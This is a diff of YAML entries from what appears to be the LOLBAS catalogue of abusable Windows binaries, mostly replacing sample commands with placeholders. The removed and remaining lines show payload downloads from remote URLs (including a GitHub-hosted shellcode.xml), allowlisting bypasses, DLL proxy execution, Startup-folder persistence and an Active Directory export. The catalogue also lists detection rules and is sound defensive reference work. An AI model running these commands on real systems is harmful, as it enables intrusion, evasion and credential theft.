@@ -32,7 +32,7 @@ Commands:
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
Category: AWL Bypass
@@ -42,14 +42,14 @@ Commands:
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}
Description: Using remote XML and XSL files, save the transformed XML file to disk.
Usecase: Download a file from the internet and save it to disk.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>:ads-name
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name
Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream.
Category: ADS

4
yml/OtherMSBinaries/Ntdsutil.yml
View File

@@ -1,7 +1,7 @@
---
Name: ntdsutil.exe
Description: Command line utility used to export Active Directory.
Author: 'Tony Lambert'
Author: Tony Lambert
Created: 2020-01-10
Commands:
- Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
@@ -13,8 +13,6 @@ Commands:
OperatingSystem: Windows
Full_Path:
- Path: C:\Windows\System32\ntdsutil.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml

4
yml/OtherMSBinaries/OpenConsole.yml
View File

@@ -4,8 +4,8 @@ Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Created: 2022-06-17
Commands:
- Command: "OpenConsole.exe calc"
Description: Execute calc with OpenConsole.exe as parent process
- Command: OpenConsole.exe {PATH:.exe}
Description: Execute specified process with OpenConsole.exe as parent process
Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User

2
yml/OtherMSBinaries/Powerpnt.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Office binary.
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Command: Powerpnt.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

8
yml/OtherMSBinaries/Procdump.yml
View File

@@ -6,8 +6,8 @@ Aliases:
Author: 'Alfie Champion (@ajpc500)'
Created: 2020-10-14
Commands:
- Command: procdump.exe -md calc.dll explorer.exe
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
- Command: procdump.exe -md {PATH:.dll} explorer.exe
Description: Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
@@ -15,8 +15,8 @@ Commands:
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
- Command: procdump.exe -md {PATH:.dll} foobar
Description: Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User

2
yml/OtherMSBinaries/ProtocolHandler.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Office binary
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: ProtocolHandler.exe https://example.com/payload
- Command: ProtocolHandler.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
Category: Download

8
yml/OtherMSBinaries/Rcsi.yml
View File

@@ -1,10 +1,10 @@
---
Name: rcsi.exe
Description: Non-Interactive command line inerface included with Visual Studio.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rcsi.exe bypass.csx
- Command: rcsi.exe {PATH:.csx}
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: CSharp
- Command: rcsi.exe bypass.csx
- Command: rcsi.exe {PATH:.csx}
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: AWL Bypass
@@ -24,8 +24,6 @@ Commands:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

12
yml/OtherMSBinaries/Remote.yml
View File

@@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-06-01
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
- Command: Remote.exe /s {PATH:.exe} anythinghere
Description: Spawns specified executable as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
- Command: Remote.exe /s {PATH:.exe} anythinghere
Description: Spawns specified executable as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
- Command: Remote.exe /s {PATH_SMB:.exe} anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
@@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml

4
yml/OtherMSBinaries/Sqldumper.yml
View File

@@ -1,7 +1,7 @@
---
Name: Sqldumper.exe
Description: Debugging utility included with Microsoft SQL.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: sqldumper.exe 464 0 0x0110
@@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml

4
yml/OtherMSBinaries/Sqlps.yml
View File

@@ -1,7 +1,7 @@
---
Name: Sqlps.exe
Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Sqlps.exe -noprofile
@@ -19,8 +19,6 @@ Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
- Path: C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml

6
yml/OtherMSBinaries/Sqltoolsps.yml
View File

@@ -1,10 +1,10 @@
---
Name: SQLToolsPS.exe
Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
- Command: SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}
Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.
Usecase: Execute PowerShell command.
Category: Execute
@@ -15,8 +15,6 @@ Commands:
- Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml
- Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md

10
yml/OtherMSBinaries/Squirrel.yml
View File

@@ -4,14 +4,14 @@ Description: Binary to update the existing installed Nuget/squirrel package. Par
Author: 'Reegun J (OCBC Bank) - @reegun21'
Created: 2019-06-26
Commands:
- Command: squirrel.exe --download [url to package]
- Command: squirrel.exe --download {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --update [url to package]
- Command: squirrel.exe --update {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -21,7 +21,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --update [url to package]
- Command: squirrel.exe --update {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
- Command: squirrel.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -41,7 +41,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
- Command: squirrel.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute

4
yml/OtherMSBinaries/Te.yml
View File

@@ -4,7 +4,7 @@ Description: Testing tool included with Microsoft Test Authoring and Execution F
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: te.exe bypass.wsc
- Command: te.exe {PATH:.wsc}
Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
Usecase: Execute Visual Basic script stored in local Windows Script Component file.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: te.exe test.dll
- Command: te.exe {PATH:.dll}
Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.
Usecase: Execute DLL file.
Category: Execute

2
yml/OtherMSBinaries/Teams.yml
View File

@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute

8
yml/OtherMSBinaries/Tracker.yml
View File

@@ -1,10 +1,10 @@
---
Name: Tracker.exe
Description: Tool included with Microsoft .Net Framework.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
Category: AWL Bypass
@@ -24,8 +24,6 @@ Commands:
- Execute: DLL
Full_Path:
- Path: no default
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml
Resources:

30
yml/OtherMSBinaries/Update.yml
View File

@@ -1,17 +1,17 @@
---
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-06-26
Commands:
- Command: Update.exe --download [url to package]
- Command: Update.exe --download {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
- Command: Update.exe --update={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -21,7 +21,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=[url to package]
- Command: Update.exe --update={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
- Command: Update.exe --update={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -41,7 +41,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
- Command: Update.exe --update={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
@@ -51,7 +51,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
- Command: Update.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -61,7 +61,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
- Command: Update.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -71,7 +71,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
Category: AWL Bypass
@@ -81,7 +81,7 @@ Commands:
Tags:
- Execute: CMD
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
- Command: Update.exe --updateRollback={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -91,7 +91,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
- Command: Update.exe --updateRollback={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
@@ -101,7 +101,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
@@ -110,8 +110,8 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
- Command: Update.exe --createShortcut={PATH:.exe} -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
Category: Execute
Privileges: User
@@ -119,7 +119,7 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
- Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
Category: Execute

4
yml/OtherMSBinaries/VSDiagnostics.yml
View File

@@ -4,7 +4,7 @@ Description: Command-line tool used for performing diagnostics.
Author: Bobby Cooke
Created: 2023-07-12
Commands:
- Command: VSDiagnostics.exe start 1 /launch:calc.exe
- Command: VSDiagnostics.exe start 1 /launch:{PATH:.exe}
Description: Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.
Usecase: Proxy execution of binary
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
- Command: VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:"{CMD:args}"
Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
Usecase: Proxy execution of binary with arguments
Category: Execute

7
yml/OtherMSBinaries/VSIISExeLauncher.yml
View File

@@ -1,10 +1,10 @@
---
Name: VSIISExeLauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'timwhite'
Author: timwhite
Created: 2021-09-24
Commands:
- Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
- Command: VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}"
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
@@ -15,8 +15,6 @@ Commands:
- Execute: EXE
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
- IOC: VSIISExeLauncher.exe spawned an unknown process
@@ -24,4 +22,3 @@ Resources:
- Link: https://github.com/timwhitez
Acknowledgement:
- Person: timwhite
Handle:

2
yml/OtherMSBinaries/Visio.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Visio Executable
Author: Avihay Eldad
Created: 2024-02-15
Commands:
- Command: Visio.exe https://example.com/payload
- Command: Visio.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

2
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
View File

@@ -17,8 +17,6 @@ Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml

6
yml/OtherMSBinaries/VsLaunchBrowser.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Visual Studio browser launcher tool for web applications
Author: Avihay Eldad
Created: 2024-04-12
Commands:
- Command: VSLaunchBrowser.exe .exe http://example.com/payload
- Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
Description: Download and execute payload from remote server
Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Download
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Download: INetCache
- Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
- Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
Description: Execute payload via VSLaunchBrowser as parent process
Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Execute
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
- Command: VSLaunchBrowser.exe .exe {PATH_SMB}
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Execute

4
yml/OtherMSBinaries/Vshadow.yml
View File

@@ -4,8 +4,8 @@ Description: VShadow is a command-line tool that can be used to create and manag
Author: Ayberk Halaç
Created: 2023-09-06
Commands:
- Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:'
Description: Executes calc.exe from vshadow.exe.
- Command: 'vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:'
Description: Executes specified executable from vshadow.exe.
Usecase: Performs execution of specified executable file.
Category: Execute
Privileges: Administrator

8
yml/OtherMSBinaries/Vsjitdebugger.yml
View File

@@ -1,11 +1,11 @@
---
Name: vsjitdebugger.exe
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Vsjitdebugger.exe calc.exe
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
- Command: Vsjitdebugger.exe {PATH:.exe}
Description: Executes specified executable as a subprocess of Vsjitdebugger.exe.
Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
Category: Execute
Privileges: User
@@ -15,8 +15,6 @@ Commands:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\vsjitdebugger.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
Resources:

2
yml/OtherMSBinaries/Wfc.yml
View File

@@ -4,7 +4,7 @@ Description: The Workflow Command-line Compiler tool is included with the Window
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: wfc.exe c:\path\to\test.xoml
- Command: wfc.exe {PATH_ABSOLUTE:.xoml}
Description: Execute arbitrary C# code embedded in a XOML file.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass

2
yml/OtherMSBinaries/Winproj.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Project Executable
Author: Avihay Eldad
Created: 2024-02-14
Commands:
- Command: WinProj.exe https://example.com/payload
- Command: WinProj.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

2
yml/OtherMSBinaries/Winword.yml
View File

@@ -4,7 +4,7 @@ Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Command: winword.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

6
yml/OtherMSBinaries/Wsl.yml
View File

@@ -1,7 +1,7 @@
---
Name: Wsl.exe
Description: Windows subsystem for Linux executable
Author: 'Matthew Brown'
Author: Matthew Brown
Created: 2019-06-27
Commands:
- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: CMD
- Command: wsl.exe --exec bash -c "<command>"
- Command: wsl.exe --exec bash -c "{CMD}"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
Category: Execute
@@ -40,8 +40,6 @@ Commands:
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Full_Path:
- Path: C:\Windows\System32\wsl.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

2
yml/OtherMSBinaries/vsls-agent.yml
View File

@@ -4,7 +4,7 @@ Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Created: 2022-11-01
Commands:
- Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
- Command: vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}
Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute

2
yml/OtherMSBinaries/vstest.console.yml
View File

@@ -4,7 +4,7 @@ Description: VSTest.Console.exe is the command-line tool to run tests
Author: Onat Uzunyayla
Created: 2023-09-08
Commands:
- Command: vstest.console.exe testcode.dll
- Command: vstest.console.exe {PATH:.dll}
Description: VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general
Usecase: Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe
Category: AWL Bypass

2
yml/OtherMSBinaries/winfile.yml
View File

@@ -4,7 +4,7 @@ Description: Windows File Manager executable
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: winfile.exe calc.exe
- Command: winfile.exe {PATH:.exe}
Description: Execute an executable file with WinFile as a parent process.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute

2
yml/OtherMSBinaries/xsd.yml
View File

@@ -4,7 +4,7 @@ Description: XML Schema Definition Tool included with the Windows Software Devel
Author: Avihay Eldad
Created: 2024-04-09
Commands:
- Command: xsd.exe http://example.com/payload
- Command: xsd.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache
Category: Download